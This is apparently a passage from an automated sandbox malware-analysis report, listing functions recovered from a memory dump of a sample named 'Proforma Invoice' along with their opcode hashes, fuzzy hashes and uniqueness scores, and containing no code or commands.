                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2e56f78b52e15613764a1a0e1bb6bb537d1e9e85139fee80cbb081840699e758
                                                                                                    • Instruction ID: 46586364a0958c8db08d288c9003dfb3e83ff23469ddebb48fe6a70ee50ce117
                                                                                                    • Opcode Fuzzy Hash: 2e56f78b52e15613764a1a0e1bb6bb537d1e9e85139fee80cbb081840699e758
                                                                                                    • Instruction Fuzzy Hash: 9D319E71B001058FDB58EBB4D4596AEB7B2AF98204B248868E406EB344EF38CD49CB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 06785DC1 Relevance: .1, Instructions: 96COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: db869fd9352317e0d71550f787118ca7332733e1c139a17e5f3b5a9aeb94101f
                                                                                                    • Instruction ID: 76a1b53b39e0e0bdea9c3ad76b6a7b00ac4583ff9645506de32cbc9993f0a1ae
                                                                                                    • Opcode Fuzzy Hash: db869fd9352317e0d71550f787118ca7332733e1c139a17e5f3b5a9aeb94101f
                                                                                                    • Instruction Fuzzy Hash: 7D31D130F482099FDB84E7B8C8157AE7BF29B85204F1580B6D609DB381EB359D45C791
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 06784E50 Relevance: .1, Instructions: 85COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 369e6cbd557f10f377c4b5302e39bdf2dd91ab9f364f8f478add44faac87173c
                                                                                                    • Instruction ID: c55adf104200c894a4b2b95799cead7edd03e30697ba15ff1dc47150e191e390
                                                                                                    • Opcode Fuzzy Hash: 369e6cbd557f10f377c4b5302e39bdf2dd91ab9f364f8f478add44faac87173c
                                                                                                    • Instruction Fuzzy Hash: FB31B471E042099FDB80EFA9D9846AEBBF6EB94314F14807AD508E7355E731EC45CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 06785697 Relevance: .1, Instructions: 78COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 50bb4c0e43ce8ad2939f20de7f506d7d5fc49ee732302984b293ccd667742699
                                                                                                    • Instruction ID: bcc9b722bdea350fcc866cc9e9887f376a69d0dd00d72f70e833ef4d46c3bb29
                                                                                                    • Opcode Fuzzy Hash: 50bb4c0e43ce8ad2939f20de7f506d7d5fc49ee732302984b293ccd667742699
                                                                                                    • Instruction Fuzzy Hash: 32216D75F402159FEB90AFB899486AE7BE5AB8C255F108835EA19E7740FB308D018B94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 067856A0 Relevance: .1, Instructions: 76COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5d9826ef31518d970afc5654482a08fd612a2a4be99692e94ff866dee0f00a71
                                                                                                    • Instruction ID: 5354b3b9b641dfe98ca884edbc7683abce70ab14c889c4b879b3908400933aae
                                                                                                    • Opcode Fuzzy Hash: 5d9826ef31518d970afc5654482a08fd612a2a4be99692e94ff866dee0f00a71
                                                                                                    • Instruction Fuzzy Hash: FC214135F402159FEB90AFB999486AE7BE5AB4C654F108435DA19E7740FF309C018B94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0678CED9 Relevance: .1, Instructions: 65COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 139c7f5350a04f108392efcbb0ecfb3ee3fc67625c904dc81786a9cab6de2301
                                                                                                    • Instruction ID: 6696b1af93eb92612e6f12c41d75652071aa2295d17a9a8fd0f5ccd48eff48ab
                                                                                                    • Opcode Fuzzy Hash: 139c7f5350a04f108392efcbb0ecfb3ee3fc67625c904dc81786a9cab6de2301
                                                                                                    • Instruction Fuzzy Hash: AE216630E0124D9FEB46EFA5E490AEEBFB6AF49305F248069E411F6250DB31DA41DF60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 06789BF8 Relevance: .1, Instructions: 59COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d30d58beebb4766e490ba33f35a03caebddb130983c4b4a27231ecfbfb8c71ab
                                                                                                    • Instruction ID: e0994d2c16f75caf57c22e40715e2b99370e4b5e8a84c4588d737d794583dd4e
                                                                                                    • Opcode Fuzzy Hash: d30d58beebb4766e490ba33f35a03caebddb130983c4b4a27231ecfbfb8c71ab
                                                                                                    • Instruction Fuzzy Hash: CF11D331A402499FDB50EF7CC884BAEBBE2AF85320F048755DA195B293D372EC10CB94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 067870D0 Relevance: .1, Instructions: 52COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e089745df722c184160735b01be9af5cda033c6a8f548a132e68c376a60a0f2a
                                                                                                    • Instruction ID: 0b69e20aeb121d742921e3ee0a56d786898fa9a226929e929adb2f3b43f16c9b
                                                                                                    • Opcode Fuzzy Hash: e089745df722c184160735b01be9af5cda033c6a8f548a132e68c376a60a0f2a
                                                                                                    • Instruction Fuzzy Hash: D1111834F102189F8B80EF6CD8599AEBBF6FB8D2107108939E51AD3354EB349D05CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0678FD59 Relevance: .0, Instructions: 33COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3f55926c171cfe11bde48e9688a06067c82735f9e06e39fdc5db86ad7bf79717
                                                                                                    • Instruction ID: 955917bcf4aca04d50af051bea71ac32bd9bb1b4bb08ebc153214c625bbeb3d2
                                                                                                    • Opcode Fuzzy Hash: 3f55926c171cfe11bde48e9688a06067c82735f9e06e39fdc5db86ad7bf79717
                                                                                                    • Instruction Fuzzy Hash: C1018178A11208EFCB80FFB4E56545C7BB1BF55204B4045A8D809E7390EB319E88CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0678FE29 Relevance: .0, Instructions: 32COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a58f7e9c7e715d8e9ed726110f287d8ab7951f9fcf1662d1c7d60c6ac5cd91e3
                                                                                                    • Instruction ID: 16233db66dcb7a959433cc00040ee0c3ef7b8f93b9add881852c9c05000fb9ea
                                                                                                    • Opcode Fuzzy Hash: a58f7e9c7e715d8e9ed726110f287d8ab7951f9fcf1662d1c7d60c6ac5cd91e3
                                                                                                    • Instruction Fuzzy Hash: 97F0BE392002089BD710BF64E890CAA37AAEFC83557018435E5018B311DF79CC01DBD0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0678FE38 Relevance: .0, Instructions: 29COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3947500eca12b1915aed944922b4132bca7f4ee4be2a70ac59226e7a312698ee
                                                                                                    • Instruction ID: e5a4b494aff148696c31bb842862dd306017a40d37debd78b426f50f2a224504
                                                                                                    • Opcode Fuzzy Hash: 3947500eca12b1915aed944922b4132bca7f4ee4be2a70ac59226e7a312698ee
                                                                                                    • Instruction Fuzzy Hash: FCF0A9392002099FCB10BF29E480CAA37AAEFC92693418439E6008B315DBB5EC41DBD0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 06784DD8 Relevance: .0, Instructions: 29COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c34d50a99cfb7f20ee2e81fe6cff4baf70e190785fd9b2d9cb514ac93754a460
                                                                                                    • Instruction ID: 752ce48ba208f2a0896791eb5ef60c61e05272d2d5e358f6a8dc58ac9445331c
                                                                                                    • Opcode Fuzzy Hash: c34d50a99cfb7f20ee2e81fe6cff4baf70e190785fd9b2d9cb514ac93754a460
                                                                                                    • Instruction Fuzzy Hash: 19E06572E401159F8B90EEBD98492AE7BFCEA88121F44457AE919D3304EA708A15C7E1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 06787131 Relevance: .0, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e33b9642a647e1bd7630e799d8fdc68555f6d7df2728f83f5868af90ea1d8ee6
                                                                                                    • Instruction ID: a43c0e5f345fbcd2a4b07aba38d2e6a1397bb925c45c4ec0af1369cb87a7b039
                                                                                                    • Opcode Fuzzy Hash: e33b9642a647e1bd7630e799d8fdc68555f6d7df2728f83f5868af90ea1d8ee6
                                                                                                    • Instruction Fuzzy Hash: E2E0C239F102189FCF44EBA8E95889CB7F1BF8D2257008475EA1AE3354EE349C11CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 06784DE8 Relevance: .0, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2a9a3544cbec531431163a9d3a68a09c03d3d1498d31722c5af2af81661de2c7
                                                                                                    • Instruction ID: ad01196cdfc8b25d1f6061958524d2661a0fb0abd31b7c5bae9e14cee71e8b0f
                                                                                                    • Opcode Fuzzy Hash: 2a9a3544cbec531431163a9d3a68a09c03d3d1498d31722c5af2af81661de2c7
                                                                                                    • Instruction Fuzzy Hash: 91E01272F001199F4B80EBBD98055AE7FF8EA88211B154476E50DD3304EA704A118BE1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0678FDDF Relevance: .0, Instructions: 23COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 35b102d3cef58f211cf079a7abb127aa6a90ba64f48eea6ac0c0eeff6dd733af
                                                                                                    • Instruction ID: cffa0f5823192ff2706246e18d143ce2e4cd3a4ca6c9fc4793fd0f3eb5cbb73c
                                                                                                    • Opcode Fuzzy Hash: 35b102d3cef58f211cf079a7abb127aa6a90ba64f48eea6ac0c0eeff6dd733af
                                                                                                    • Instruction Fuzzy Hash: D7F0C079D00108EBCB51DFF0D9955DDBBB5EB88301F1085AA9415A2240EA355B55DF80
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0678FDF0 Relevance: .0, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9fb4e5c90a860b566865e3beb7435fcb651d6fe7e936732b4aa4de2528af6337
                                                                                                    • Instruction ID: b61ec4fbd39057f6e7a6c511bb9918c26efe37484234facc70668034ff9d7d3f
                                                                                                    • Opcode Fuzzy Hash: 9fb4e5c90a860b566865e3beb7435fcb651d6fe7e936732b4aa4de2528af6337
                                                                                                    • Instruction Fuzzy Hash: 5DE09A75D0020CEFCB41DFE4D5558DDBBB5FB48201F1081A6D805A3240EB345B55DF81
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%